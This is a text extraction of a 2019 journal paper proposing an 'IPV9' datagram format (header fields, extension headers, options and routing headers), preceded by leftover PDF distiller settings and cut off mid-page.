/PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_o3awhuaaxngcjmt2ayuw4avejy ---- 引言 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 10 Research and Design of Next Generation Internet (IPV9) Datagram Wang Zhongsheng 1. State and Provincial Joint Engineering Lab. of Advanced Network, Monitoring and Control, China 2. School of Computer Science and Engineering Xi'an Technological University Xi'an, China e-mail: wzhsh1681@163.com Xie Jianping 1. Chinese Decimal Network Working Group Shanghai, China 2. Shanghai Decimal System Network Information Technology Ltd. e-mail: 13386036170@189.cn Lin Zhao 1. Chinese Decimal Network Working Group Shanghai, China 2. Shanghai Decimal System Network Information Technology Ltd. e-mail: chinalinzhao@126.com Zhong Wei 1. Chinese Decimal Network Working Group Shanghai, China 2. Shanghai Decimal System Network Information Technology Ltd. e-mail: 13331860961@189.cn Abstract—The current global Internet USES the TCP/IP protocol cluster. IP is the network layer protocol and the core protocol in this protocol family. The current version is IPv4 with 32-bit addresses. With the popularity of Internet applications, the limited address space defined by IPv4 has been exhausted. To expand the address space, the Internet Engineering Task Force (IETF) has designed the next generation IP protocol, IPv6, to replace IPv4. IPv6 redefines the address space, using a 128-bit address length that provides almost unlimited addresses. However, with the development and application of the Internet of things, big data and cloud storage, IPv6 has some shortcomings in its address structure design, security and network sovereignty, so it is urgent to develop a new generation or future internet with security and reliability, autonomy and controllable , and it becomes a research hotspot in the world. This paper developed a new generation Internet (IPV9) datagram by researching the existed IPv4 and IPv6, and it is based on the method of assigning addresses to computers connected to the Internet by full decimal character code which designed by the Chinese Decimal Network Working Group with the leader of Xie Jianping. It is a subsequent version with RFC1606, RFC1607, a new generation of network data structure, it is not the updating of IPv4 [RFC - 791] and IPv6 [RFC - 1883], [RFC - 2464], it is a new vision to demonstration and testing. Keywords-Future Network; IPv4; IPv6; IPV9; Datagram A datagram is the basic unit of data transmitted on the network. It contains a header and the data itself, in which the header describes the destination of the data and its relationship to other data. Datagram is a complete and independent data entity, which carries the information to be transferred from the source computer to the destination computer and does not rely on the previous exchange between the source and the destination and the transmission network [1]. TCP/IP protocol defines a packet that is transmitted on the Internet; called IP Datagram, which are the network layer protocol and the core protocol of the TCP/IP protocol family. DOI: 10.21307/ijanmc-2019-030 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 11 IP is a virtual package consisting of a header and data. The IPv4 header is a fixed length of 20 bytes, which is required for all IP datagram. After the fixed portion of the header are optional fields whose length is variable. Both the source and destination addresses in the header are IP protocol addresses. The current global Internet USES the TCP/IP protocol cluster, the current version is IPv4 with 32-bit addresses. With the popularity of Internet applications, the limited address space defined by IPv4 has been exhausted. To expand the address space, the Internet Engineering Task Force (IETF) has designed the next generation IP protocol, IPv6, to replace IPv4. IPv6 redefines the address space, using a 128-bit address length that provides almost unlimited addresses. However, with the development and application of the Internet of things, big data and cloud storage, IPv6 has some shortcomings in its address structure design, security and network sovereignty. The Chinese researchers developed a new generation Internet (IPV9) datagram by researching the existed IPv4 and IPv6, and it is based on the method of assigning addresses to computers connected to the Internet by full decimal character code. It is a subsequent version with RFC1606, RFC1607, a new generation of network data structure, it is not the updating of IPv4 and IPv6, it is a new vision to demonstration and testing. I. OVERALL DESIGN OBJECTIVE In order to be compatible with the existing Internet system, on the basis of studying the existing standard IPv4 [RFC -791] and IPv6 [RFC -1883] and [RFC - 2464], the overall goal of IPV9 datagram design is formulated. 1) Extended address capacity IPV9 increases the length of IP addresses from 32 (IPv4) and 128 (IPv6) bits to 2048 bits to support more address hierarchies, more addressable nodes, and simpler automatic address configurations. It also increases the IPv4 32 bit address length reduced to 16 bits, in order to solve mobile communication. 2) Variable length and uncertain number digits In order to reduce the network overhead, this datagram designing adopts the method of indefinite length and uncertain number of digits. By adding a "range" field to the multicast address, the scalability of multicast routing is improved. It defines a new address type, "any broadcast address," for sending datagrams to any one of a set of nodes. 3) Simplify and improve header format Some IPv4 header fields have been eliminated or made optional to reduce the overhead of common processing on packet control and to limit IPV9 header bandwidth overhead. The encoding of header options has been changed to allow more efficient forwarding, reduce restrictions on the length of options, and gain more flexibility to introduce new options in the future. 4) Label data streams To attach labels to data streams belonging to a particular data communication, the sender may require special processing of these data streams, such as non- default quality of service or real-time service, such as using virtual circuits to achieve the purpose of circuit communication. 5) High safety and reliability To get security and reliability, the new datagram added expansionary support for IP address encryption and authentication, data integrity, and data security (optional) in IPV9 designing. It extension headers and options take into account the length of packets, the semantics of flow control labels and categories, and the impact on high-level protocols. 6) Direct routing addressing The ICMP (Internet Control Message Protocol) version of IPV9 contains all the requirements for implementing IPV9. The function of route character arrangement authentication, recognition and addressing is added, which reduces the routing cost and improves the efficiency. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 12 7) Compatible with IPv4 and IPv6 In order to ensure a smooth transition from IPv4 to IPV9, considering the protection of the original investment and not changing user habits, this datagram defines IPV9 header and transitional header. The last segment address is used for the header of IPv4 or IPv6 is used, but the version number is changed to 9, the connection protocols used are IPv4 or IPv6. 8) The virtual and real circuit design In order to smoothly transmit voice, image and video and other big data real-time applications, it is necessary to adopt long-stream code, absolute value, return code and other technologies, and adopt three- layer and four-layer network hybrid architecture. Three-layer and four-layer network hybrid architecture design should be implemented in virtual and real circuits. II. GENERAL DESIGN OF SYSTEM A. Some basic terminologies The basic concepts in system designing are defined as follows. 1) Node: a device installed with IPV9 or IPV9 device compatible with IPv4 and IPv6. 2) Router: the device that is responsible for forwarding and explicitly not sending IPV9 data to itself. 3) Host: any node that does not belong to the router. 4) Upper agreement: Protocols located in the layer above IPV9. For example, transport layer protocols TCP, UDP, a communication facility or medium in the link layer, on which nodes can carry out link-layer communication, that is, the layer just below IPV9. Examples of links include Ethernet (or bridged), PPP links, X.25, frame relay, or ATM networks. 5) Neighbor: each node connected to the same link. 6) Interface: node to link connection. 7) Address: IPV9 layer identifier of an interface or a group of interfaces. 8) Packet: An IPV9 header plus load. 9) Link MUT (Maximum Transmission Unit): the Maximum Transmission Unit that can be transmitted on a section of link, namely the Maximum data packet length in eight-bit group. 10) Path MUT: the smallest MUT of all links in the path between the source node and the destination node. Note: for a device with multiple interfaces, it can be configured to forward non-self-directed packets from one of its interfaces and drop from other interfaces. When such a device receives data from a previous interface or interacts with a neighbor, the protocol requirements of the host must be followed. B. IPV9 header format The format design of IPV9 datagram header is shown in table 1. TABLE I. IPV9 HEADER FORMAT Version Number Category Type Flow Label Address Length Priority class Communication Authentication Address Absolute Communication Payload Length Next Header Hop Limit Source Address (16-2048 bit) Destination Address (16-2048bit) Time Authorization Code International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 13 The design of table 1 is explained below. 1) Version Number: The length is 4 bits, representing the Internet protocol version number. For IPV9, this field must be 9. 2) Category Type: The length is 8 bits, the high 3 bits are used to specify the address length, its volume is 0 to 7, and it’s 2 to the power. Contains address length of 1Byte ~ 128Byte; the default value is 256 bits, where 0 is 16 bits, 1 is 32 bits, 2 is 64 bits, 3 is 128 bits, 4 is 256 bits, 5 is 512 bits, 6 is 1024 bits, and 7 is 2048 bits. The last five bits specify the communication class and authentication for the source and destination addresses. 0 to 15 is used to specify the priority class of the communication, 6 to 7 is used to specify the communication method after the first authentication, which is used by the packet sending place for control and whether the source address and destination address authentication is needed. 8 to 14 are used to specify absolute communication that will not fall back when congestion is encountered, and 15 are used for virtual circuits. 16 and 17 are used to assign audio and video, called absolute value, to ensure the uninterrupted transmission of audio and video. The other values are reserved for future use. 3) Flow Label: with a length of 20 bits, it is used to identify packages belonging to the same business flow. 4) Payload Length (Net Load Length): the length is 16 bits, including the net load byte length, that is, the number of bytes contained in the packet after IPV9 header. 5) Next Header: the length is 8 bits. This field indicates the protocol type in the field following the IPV9 header. 6) Hop Limit: the length is 8 bits, and this field is subtracted one each time a node forwards a packet. 7) Source Address: the length is 8bit ~ 2048bit, and the sender address of IPV9 packet is specified. Adopt the method of Variable length and uncertain number digits. 8) Destination Address: the length is 8 bit ~ 2048 bit, and the destination address of IPV9 packet is specified. Adopt the method of Variable length and uncertain number digits. 9) Time: it is used to control the lifetime of the address in the header. 10) Authorization Code: it is used to identify the authenticity of the address in the header. C. Extended headers of IPV9 In IPV9 datagrams, Internet optional information is placed in specialized headers which between the packet IPV9 header and the high-level protocol header. The number of such extended headers is not too much, and each identified by a different value for the next header. An IPV9 packet can have zero to more than one extension header, each of which is defined in the next header S field in the previous header, as shown in table 2. TABLE II. EXTENDED HEADER FORMAT IPV9 Header Label NEXT HEADER =TCP TCP HEADER +DATA IPV9 Header Label NEXT HEADER = ROUTE ROUTING HEADER NEXT HEADER =TCP TCP HEADER +DATA IPV9 Header Label NEXT HEADER = ROUTE ROUTING HEADER NEXT HEADER = DATA SEGMENT DATA SEGMENT HEADER NEXT HEADER =TCP TCP DATA SEGMENT HEADER +DATA International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 14 On the path of the packet passing, no node to checks or processes the extended header until the packet reaches the node specified by the destination address field in the IPV9 header (or, if it is a multicast address, it would be a group of nodes). For the normal multiplexing of the next header field of IPV9 header, the processing module is called to process the first extended header. If an extended header does not exist, the high level header is processed. Therefore, the extension headers must be processed exactly in the order in which they appear in the packet, and the receiver cannot scan the packet to find a particular extension header and process it before processing other preceding headers. If a node, after processing the header wants to process the next header, but it does not recognize the value of the "next header" , it will lost the packet, and sends the source a "ICMP parameter problem" message, the message ICMP code has a value of 2 (can't identify the "next header" type), "ICMP indicator" contained in the field could not identify the "next header values" offset location in the original packets. The same is done if a node finds the "next header" field is 0 in any non- IPV9 header. Each extended header is an integer multiple of the 8-bit array so that subsequent headers can be aligned along 8-bit array boundaries. In the extended header, the fields made up of multiple 8-bit groups are internally aligned with their internal natural boundaries, that is, the position in the fields of width n 8-bit groups are placed at the beginning of the header, an integer times n 8-bit groups, where n=1,2,4 or 8. The fully installed IPV9 includes the following extension headers:  Hop-by-Hop Option(segment options)  Routing（type 0）  Fragment;  Destination Options;  Authentication;  Encapsulating Security Payload. This paper defines the first four extension headers, and the next two additional definitions. 1) The sequence of extension headers When multiple extension headers are used in the same packet, they appear in the following order: a IPV9 header; b segment options header; c Destination options header(annotation 1); d Routing header; e Data segment header; f Authentication header; g Encapsulate security load header; h Destination option header(annotation 2); i The upper header; Annotation 1: Options for the first destination node to appear in the IPV9 destination address field and for subsequent destination nodes listed in the routing header. Annotation 2: The option to be processed only by the destination node of the packet. Each extended header can occur at most once, but destination option headers can occur at most twice, once before routing headers and once before high-level headers. If the high-level header is another IPV9 header (that is, when IPV9 is encapsulated in another IPV9 tunnel), it can be followed by its own extended headers, which, as a whole, follow the same sequence. When defining other extended headers, it must specify a sequential relationship between them and the headers listed above 2) Options When the extension header is defined the segment- by-segment option and the destination option header have an unequal number of options encoded in the form of Type length value (TLV). The format is shown in table 3. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 15 TABLE III. OPTION FORMAT Option Type Option data length Option data Where, Option type: 8-bit identifier. Option data length: 8-bit unsigned integer. It is the length of the data field for this option, in 8-bit groups. Option data: Variable length field, the data is related to the option type. The order of the options in the header must be handled in strict accordance with the order in which they appear in the header. The receiver cannot scan the header for a particular type of option and cannot process it before processing all previous options. The option type identifier is internally defined, and its highest two bits specify what must be done if the node handling IPV9 cannot identify the option type. 00: Skip this option and continue with the header. 01: Abandon the packet. 10: Abandon the packet and send a "ICMP parameter problem, code 2," message to the source address, regardless of whether the destination address is a multicast address, indicating that the option type is not recognized. 11: Abandon the packet. Only when the destination address of the packet is not a multicast address, send a message of "ICMP parameter problem, code 2" to the source address, indicating the type of option it cannot recognize. The high third bit of the option type specifies whether the data for this option can change on the way to the destination of the packet. 0: Option data cannot be changed during transport. 1: Option data can be changed during transport. When the authentication header appears in the packet, when calculating the authentication value of the packet, the whole field in which any data can change in the way is treated as an 8-bit group of all zeros. Each option can have its own alignment requirements to ensure that the values of multiple 8-bit groups in the option data field fall to the natural boundaries. The alignment of the choices is required in terms of Xn+y, the option type must be an integer multiple of x 8-bit groups plus y 8-bit groups from the beginning of the header. Such as: 2n means the offset is any multiple of two 8-bit groups from the beginning of the header. 8n+2 means the offset is any multiple of eight 8-bit groups from the beginning of the header plus two 8-bit groups. 3) Pad option a) Pad1 option(Alignment requirement: none) 0 Notice: the format of the Pad1 option is a special case where there is no length field or value field. The Pad1 option is used to insert an 8-bit group of fill bits in the header option field. b) PadN option If need to fill out multiple 8-bit groups, it should be used the PadN option instead of multiple Pad1 options. The PadN option format (alignment requirement: none) is shown in table 4. TABLE IV. PADN OPTION FORMAT 1 Option data length Option data The PadN option inserts two or more 8-bit groups of fill bits into the header option field. To fill in N 8-bit groups, the value of the option data length field should be N-2, and the option data field contains N-2 all-0 8- bit groups. 4) Segment options header International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 16 Segment options header is used to carry the option information that must be checked and processed by all nodes on the path the packet travels through. In IPV9, the header of each network segment option is represented by the value of the next header is 0, as shown in table 5. TABLE V. SEGMENT OPTIONS HEADER FORMAT Next header The extension length of the header Options Next header：It's an 8-bit selector. It is used to identify the header type just following the each segment header option. It is the same value as the IPv4 protocol field [rfc-1700]. The extension length of the header: It is an 8-bit unsigned integer. The length of the header of each segment option, in 8-bit groups, does not include the first 8-bit group. Option: variable length field whose length makes the length of each segment header an 8-bit integer multiple. It contains one or more TLV encoding options. In addition to the Pad1 and PadN options specified above, the large load options (alignment requirement: 4n+2) are defined, as shown in table 6. TABLE VI. LARGE LOAD OPTION FORMAT 194 Option data length Heavy load length The large load option is used to send IPV9 packets with a load length of more than 65,535 8-bit groups, the large load length is the length of the packet, in 8-bit groups, excluding IPV9 headers but including segment option headers, it has to be greater than 65,535. If a packet with a large load option is received and the large load length is less than or equal to 65535, a message of "ICMP parameter problem, code 0" is sent to the source node, pointing to the high bit of the invalid large load length field. If the packet has a large load option, the load length in the IPV9 header must be set to 0. If received a packet that contains both a payload length option and an IPV9 payload length field that is not 0, it need to send a message to the source node with "ICMP parameter has a problem, code 0" and pointing to the large payload option type field. The large load option cannot be used in packets with segment headers. If the data segment header is encountered in the packet containing the high-load option, a message "ICMP parameter problem, code 0" will be sent to the source node, pointing to the first 8- bit group of the data segment header. If the installed IPV9 does not support the large load option, it does not have an interface to a link with MTU greater than 65535 (IPV9 header with 72 8-bit groups, plus 4G 8-bit group loads). 5) Routing header IPV9 USES the routing header to list one or more intermediate nodes that needs to be accessed on the path of the packet to the destination node. This function is very similar to the source routing options of IPv4. The routing header is identified by the next header field whose previous header median value is 43; the format is shown in table 7. TABLE VII. ROUTING HEADER FORMAT Next header Length of the extension header Routing type Remaining data segment Data related to type Next header: It's an 8-bit selector. It Use the same value as the IPv4 protocol field [RFC-1700]. Length of the extension header: It is an 8-bit unsigned integer. The routing header length is in 8-bit groups, does not contain the first 8-bit group. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 17 Routing type 0: the route header variable's 8-bit identifier Remaining data segment: It is an 8-bit unsigned integer. The number of remaining routing data segments, that is, the number of intermediate nodes explicitly listed, which are the nodes to be accessed before reaching the final destination node. Data related to type: It is a variable length field, whose format is determined by the route type, its length makes the entire route header an integer, multiple of the 8-bit group. If a node encounters an unrecognized routing type value while processing the received packet, the action that the node will take depends on the value of the remaining data segment field. It includes the following two cases: a) If the value of the remaining data segment field is 0, the node must ignore the routing header and continue to process the next header of the packet. The header type is given in the header field next to the routing header. b) If the value of the remaining data segment field is not 0, the node must abandon the packet and send a message of "ICMP parameter exists problem, code 0" to the source address of the packet, pointing to the unrecognized routing type The format of the route header for type 0 is shown in table 8. TABLE VIII. TYPE 0 ROUTING HEADER FORMAT Next header Length of extension header Routing Type =0 Remaining data segment Reserve Strict/loose bit innuendo Address [1] Address [2] …… Address [n] Next header: It is an 8-bit selector. Its identity follows the routing header type. it USES the same value as the IPv4 protocol field [RFC-1700]. Length of extension header: It is an 8-bit unsigned integer. The routing header length is in 8-bit groups that does not contain the first 8-bit group. For routing headers of type 0, the header extension length is equal to twice the number of addresses in the header and is an even number less than or equal to 46. Routing type is 0. Remaining data segment: It is an 8-bit unsigned integer. The number of remaining routing data segments, that is, the number of intermediate nodes explicitly listed, which are the nodes to be accessed before reaching the final destination node. The maximum effective value is 23. Reserve: It is an 8-bit reserved field. The sender initializes it to 0, and the receiver ignores the field. Strict/loose bit innuendo: 1 to 23 from left to right. For each routing data segment, indicate whether the next destination address must be the neighbor of the previous node: 1 indicates strict (must be neighbor), 0 indicates loose (need not be neighbor). Address [1…..n]: It’s a 256-bit address vector, value from 1 to n. Multicast addresses cannot appear in routing header packets of type 0 or in routing header packets of type 0 in the destination address field of IPV9. If the value of the zero bit of the Strict/loose bit innuendo is 1, the destination address field in the IPV9 header of the original packet must indicate a neighbor of the source node. If the zero bit is 1, the sender can International Journal of Advanced Network, Monitoring and Controls Volume 04, 